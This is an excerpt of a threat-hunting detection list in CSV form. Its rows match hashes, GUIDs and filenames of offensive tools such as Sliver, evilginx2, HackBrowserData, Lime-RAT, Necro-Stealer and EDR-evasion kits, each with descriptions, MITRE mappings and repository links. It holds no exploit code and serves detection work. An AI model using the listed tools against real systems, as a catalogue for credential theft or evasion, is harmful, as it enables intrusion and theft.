"*abe5927545e372ee51e2dd855cc1b927fe15073db14e72832d579d73d37be100*",".{0,1000}abe5927545e372ee51e2dd855cc1b927fe15073db14e72832d579d73d37be100.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - 
T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","33033" "*abeda25578952d37a4fdf1814b55799bc99ebd54643fa7608c34750832deb425*",".{0,1000}abeda25578952d37a4fdf1814b55799bc99ebd54643fa7608c34750832deb425.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33034" "*abef624f84b21fb45d4b9d39693863c6bf4e9ddb94830f797c129d03937a7f03*",".{0,1000}abef624f84b21fb45d4b9d39693863c6bf4e9ddb94830f797c129d03937a7f03.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","33035" "*ABF5940C-60AC-4892-B3F0-0F9262C550B3*",".{0,1000}ABF5940C\-60AC\-4892\-B3F0\-0F9262C550B3.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#GUIDProject","N/A","9","","N/A","","","","33036" 
"*abfd0a70ecabaaa68a9f51b548542577c3859268b352c92cb7d9fa1caf6c3168*",".{0,1000}abfd0a70ecabaaa68a9f51b548542577c3859268b352c92cb7d9fa1caf6c3168.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33037" "*abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71*",".{0,1000}abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33038" "*abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71*",".{0,1000}abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33039" "*abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71*",".{0,1000}abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33040" "*abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71*",".{0,1000}abfd58bdd84c727b71ed7091ae3865a774c9d838b3eaf1a6b249119234d83a71.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33041" "*abopscript.txt*",".{0,1000}abopscript\.txt.{0,1000}","offensive_tool_keyword","EQGR","Equation Group scripts and tools","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","33042" "*About to download Metasploit payload *",".{0,1000}About\sto\sdownload\sMetasploit\spayload\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","33043" "*abpttsclient.py*",".{0,1000}abpttsclient\.py.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","33044" 
"*ABPTTSClient-log.txt*",".{0,1000}ABPTTSClient\-log\.txt.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","33045" "*abpttsfactory.py*",".{0,1000}abpttsfactory\.py.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","33046" "*AbuseGithubAPI*.cpp*",".{0,1000}AbuseGithubAPI.{0,1000}\.cpp.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","33047" "*AbuseGithubAPI*.exe*",".{0,1000}AbuseGithubAPI.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","33048" "*ac03d370bbdfc9037c1dfb4fc9a4fc5a3914acb58e082a33fc5c52bdbc8768f4*",".{0,1000}ac03d370bbdfc9037c1dfb4fc9a4fc5a3914acb58e082a33fc5c52bdbc8768f4.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","33051" 
"*ac0a36687a87166b27a9d2f4c041e5131b3aca69ab811086591117bd7f3b7eb3*",".{0,1000}ac0a36687a87166b27a9d2f4c041e5131b3aca69ab811086591117bd7f3b7eb3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33053" "*ac0b5929af1c06ef6d9655a5856c2ac6908c9f4979bd2a7c12f30562fd7f7520*",".{0,1000}ac0b5929af1c06ef6d9655a5856c2ac6908c9f4979bd2a7c12f30562fd7f7520.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33054" "*ac0eb86fafd0ca2e1450238cfb023c1c82b6d24fec249623ff1d0e161b7727c6*",".{0,1000}ac0eb86fafd0ca2e1450238cfb023c1c82b6d24fec249623ff1d0e161b7727c6.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","33056" 
"*ac0eb86fafd0ca2e1450238cfb023c1c82b6d24fec249623ff1d0e161b7727c6*",".{0,1000}ac0eb86fafd0ca2e1450238cfb023c1c82b6d24fec249623ff1d0e161b7727c6.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","33057" "*ac13e657c6b4d2526c00443025cc5a142439b952ea269e20a2d64fa2da712c42*",".{0,1000}ac13e657c6b4d2526c00443025cc5a142439b952ea269e20a2d64fa2da712c42.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33058" "*ac208550f9e5497ef437b924f8e284359c7cdff98f2d1924d212821ae544940d*",".{0,1000}ac208550f9e5497ef437b924f8e284359c7cdff98f2d1924d212821ae544940d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33063" "*ac22717875ec08d5ca32ca6b1846917e63f8a4db4de56138f782ac231e9a784f*",".{0,1000}ac22717875ec08d5ca32ca6b1846917e63f8a4db4de56138f782ac231e9a784f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33064" 
"*ac22d31fa6c3525c62ae4c2536d27ef042d37a23a76691519bfd72671d313fef*",".{0,1000}ac22d31fa6c3525c62ae4c2536d27ef042d37a23a76691519bfd72671d313fef.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33065" "*ac237c0f9cc970822dee74c4251b50a87c637af3d8b087ceb5162aaee4b67381*",".{0,1000}ac237c0f9cc970822dee74c4251b50a87c637af3d8b087ceb5162aaee4b67381.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","33066" "*ac24f9111a5e72c85f2b32ce3c09f46814363c98383be1e972839d89b1a3d18c*",".{0,1000}ac24f9111a5e72c85f2b32ce3c09f46814363c98383be1e972839d89b1a3d18c.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","33067" "*ac26616ae7d5b4516fa1a182a49dd3466e337a6fc13a4373f9cf3f973d83a173*",".{0,1000}ac26616ae7d5b4516fa1a182a49dd3466e337a6fc13a4373f9cf3f973d83a173.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - 
T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","33068" "*ac2d0b0b024bc8584bcaf30d16b3ccc876fe0fca14e2907e56b928514c8d61c6*",".{0,1000}ac2d0b0b024bc8584bcaf30d16b3ccc876fe0fca14e2907e56b928514c8d61c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33070" "*ac3107cf-291c-449b-9121-55cd37f6383e*",".{0,1000}ac3107cf\-291c\-449b\-9121\-55cd37f6383e.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","0","#GUIDproject","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","33071" "*ac32a19580d4f26d045e8555fb3b9f1415a45af8cbc3a67ea8d9c49dba11cdf1*",".{0,1000}ac32a19580d4f26d045e8555fb3b9f1415a45af8cbc3a67ea8d9c49dba11cdf1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33072" "*ac398617ce13e70e253f59d8d41c1c3c0f70875c6acd40634b1125d9a5fc20c2*",".{0,1000}ac398617ce13e70e253f59d8d41c1c3c0f70875c6acd40634b1125d9a5fc20c2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33073" "*ac4319f7349146fa891f608416dbf40475ebfdbbbec155939eb34d8fa1a67079*",".{0,1000}ac4319f7349146fa891f608416dbf40475ebfdbbbec155939eb34d8fa1a67079.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","33075" "*ac4329a75f33a71b5b4ece7aeae9d6e09e99b033809b85b7f1ebb2e80f32ab3a*",".{0,1000}ac4329a75f33a71b5b4ece7aeae9d6e09e99b033809b85b7f1ebb2e80f32ab3a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - 
T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","33076" "*ac4638d1cbe7a1db75e200b8ef62be5b5311fe858450d7562b86bf94c17d1d0f*",".{0,1000}ac4638d1cbe7a1db75e200b8ef62be5b5311fe858450d7562b86bf94c17d1d0f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33077" "*ac49d2041cd57b1efba672c3305b621ebb265380010b8951cda01c055a7e1e64*",".{0,1000}ac49d2041cd57b1efba672c3305b621ebb265380010b8951cda01c055a7e1e64.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","#filehash","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","33078" "*ac518d48ff20843cd624d2e530d6a507d412ef7749421bf39cd7f23eb817f11c*",".{0,1000}ac518d48ff20843cd624d2e530d6a507d412ef7749421bf39cd7f23eb817f11c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","33079" 
"*ac573a39363e52c1f32be7f75d8eeffae5bf21689b6f07804e1f5c667c40f6be*",".{0,1000}ac573a39363e52c1f32be7f75d8eeffae5bf21689b6f07804e1f5c667c40f6be.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","33080" "*ac62eec9b4b7616cd207fda9ff22de6905f3872dcc81d03e5d67fe87e4e3b448*",".{0,1000}ac62eec9b4b7616cd207fda9ff22de6905f3872dcc81d03e5d67fe87e4e3b448.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","33082" "*ac66758a6f95a4ec9aadef67b4bb85dec9aaa8fd98f0f52cbdfe519ac1c78d77*",".{0,1000}ac66758a6f95a4ec9aadef67b4bb85dec9aaa8fd98f0f52cbdfe519ac1c78d77.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","33083" "*ac6ae000d13f06fd4a0f87af57a2dcc4559fc5d5aa4cc7a1606139ffa85cf473*",".{0,1000}ac6ae000d13f06fd4a0f87af57a2dcc4559fc5d5aa4cc7a1606139ffa85cf473.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33084" "*ac6ffecbe45068d2dad0314da15f3b193eef94fd005d24646ed246d69bbb6782*",".{0,1000}ac6ffecbe45068d2dad0314da15f3b193eef94fd005d24646ed246d69bbb6782.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33086" "*ac77cefd856217e33d5acc730ea62c1a63e77a7a2fdd587d6d9bbfcea3e4da1d*",".{0,1000}ac77cefd856217e33d5acc730ea62c1a63e77a7a2fdd587d6d9bbfcea3e4da1d.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/0xsp-SRD/mortar","1","0","#filehash","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","33088" "*ac9215db682509ab2bdcba7fe924d84dafa1d8aade87172c1c6328b2cb6c9e52*",".{0,1000}ac9215db682509ab2bdcba7fe924d84dafa1d8aade87172c1c6328b2cb6c9e52.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#filehash","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","33089" "*ac924e7efddd20c4d783e7a0a30d6d8925f5a077b9450a49bed32a0b0bb255fd*",".{0,1000}ac924e7efddd20c4d783e7a0a30d6d8925f5a077b9450a49bed32a0b0bb255fd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33090" "*ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753*",".{0,1000}ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 
- TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","33091" "*aca56ff9f53e0eb7aa21022d1878c645badcc301aff0277794450830b14905c8*",".{0,1000}aca56ff9f53e0eb7aa21022d1878c645badcc301aff0277794450830b14905c8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33094" "*aca84bf57ae794734cda84fb8208abed12a248067e7012c2fde2718dce7b41b3*",".{0,1000}aca84bf57ae794734cda84fb8208abed12a248067e7012c2fde2718dce7b41b3.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33096" "*aca998015730e52a8f984a025bc4cd5ec31b0aa783828ab1a6159d7082aca0e8*",".{0,1000}aca998015730e52a8f984a025bc4cd5ec31b0aa783828ab1a6159d7082aca0e8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33097" "*acac4db9c3f6c44711409a3fb564de89a747643d53b8d65c9c3a06e56f28875f*",".{0,1000}acac4db9c3f6c44711409a3fb564de89a747643d53b8d65c9c3a06e56f28875f.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","33098" "*acacad2cec4f7abe6f054e451bfe9d2b5e816d74c94f17b8cb38300a1f2851e8*",".{0,1000}acacad2cec4f7abe6f054e451bfe9d2b5e816d74c94f17b8cb38300a1f2851e8.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","33099" 